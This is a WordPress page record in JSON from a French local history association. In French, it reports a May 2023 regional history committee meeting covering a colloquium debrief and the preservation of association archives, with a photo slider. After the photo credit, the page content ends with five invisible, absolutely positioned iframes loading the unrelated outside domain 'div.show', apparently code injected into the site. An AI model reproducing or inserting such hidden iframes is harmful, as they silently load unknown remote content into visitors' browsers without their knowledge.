{"id":7009,"date":"2023-07-04T16:14:38","date_gmt":"2023-07-04T14:14:38","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7009"},"modified":"2023-07-04T16:33:25","modified_gmt":"2023-07-04T14:33:25","slug":"reunion-chmp","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7009","title":{"rendered":"R\u00e9union CHMP"},"content":{"rendered":"<h2>22 mai 2023<\/h2>\n<p>Lorry-l\u00e8s-Metz \u00ab au fil du temps \u00bb \u00e9tait pr\u00e9sent \u00e0 la r\u00e9union du Comit\u00e9 d\u2019Histoire du Pays Messin, rassemblant des associations de Pays messin pour \u00e9changer des informations, des conseils, poser des questions, bref, r\u00e9fl\u00e9chir ensemble. \u00c0 l\u2019ordre du jour :<\/p>\n<ul style=\"list-style-type: circle;\">\n<li>Le d\u00e9briefing tr\u00e8s positif du colloque 25 mars dernier qui s\u2019est d\u00e9roul\u00e9 \u00e0 Lorry-l\u00e8s-Metz (h\u00f4te), avec comme objectif de choisir des th\u00e8mes pouvant \u00eatre pr\u00e9sent\u00e9s par tous les villages alentours.<\/li>\n<li>La question \u00e9pineuse et tr\u00e8s complexe de la sauvegarde des archives associatives en cas de don ou de dissolution de l\u2019association. Comment pr\u00e9parer ses archives physiques et num\u00e9riques \u00e0 l\u2019archivage, v\u00e9rifier leur pertinence, ventiler les documents, etc\u2026 ensuite les proposer aux \u00ab institutions archivantes \u00bb ou envisager d\u2019autres solutions innovantes.<\/li>\n<li>Le traditionnel tour de table pour les derni\u00e8res informations.<\/li>\n<\/ul>\n<p>Rendez-vous est pris pour le 9 octobre prochain pour d\u2019autres r\u00e9flexions.<\/p>\n<div id=\"metaslider-id-7016\" style=\"width: 100%; margin: 0 auto;\" class=\"ml-slider-3-108-0 metaslider metaslider-responsive metaslider-7016 ml-slider has-dots-nav ms-theme-default\" role=\"region\" aria-label=\"2023 CHMP\" data-height=\"600\" data-width=\"800\">\n    <div id=\"metaslider_container_7016\">\n        <ul id='metaslider_7016' class='rslides'>\n            <li aria-roledescription='slide' aria-labelledby='slide-0'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/A01.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/A01-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7016 slide-7017 msDefaultImage\" title=\"A01\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-1'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/A02.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/A02-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7016 slide-7018 msDefaultImage\" title=\"A02\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-2'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/A03.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/A03-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7016 slide-7019 msDefaultImage\" title=\"A03\" \/><\/a><\/li>\n        <\/ul>\n        \n    <\/div>\n<\/div>\n<p>Photos Claudine Kester<\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7005\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-378\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>22 mai 2023 Lorry-l\u00e8s-Metz \u00ab au fil du temps \u00bb \u00e9tait pr\u00e9sent \u00e0 la r\u00e9union du Comit\u00e9 d\u2019Histoire du Pays Messin, rassemblant des associations de Pays messin pour \u00e9changer des informations, des conseils, poser des questions, bref, r\u00e9fl\u00e9chir ensemble. \u00c0&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":7005,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-7009","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7009"}],"version-history":[{"count":7,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7009\/revisions"}],"predecessor-version":[{"id":7025,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7009\/revisions\/7025"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7005"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}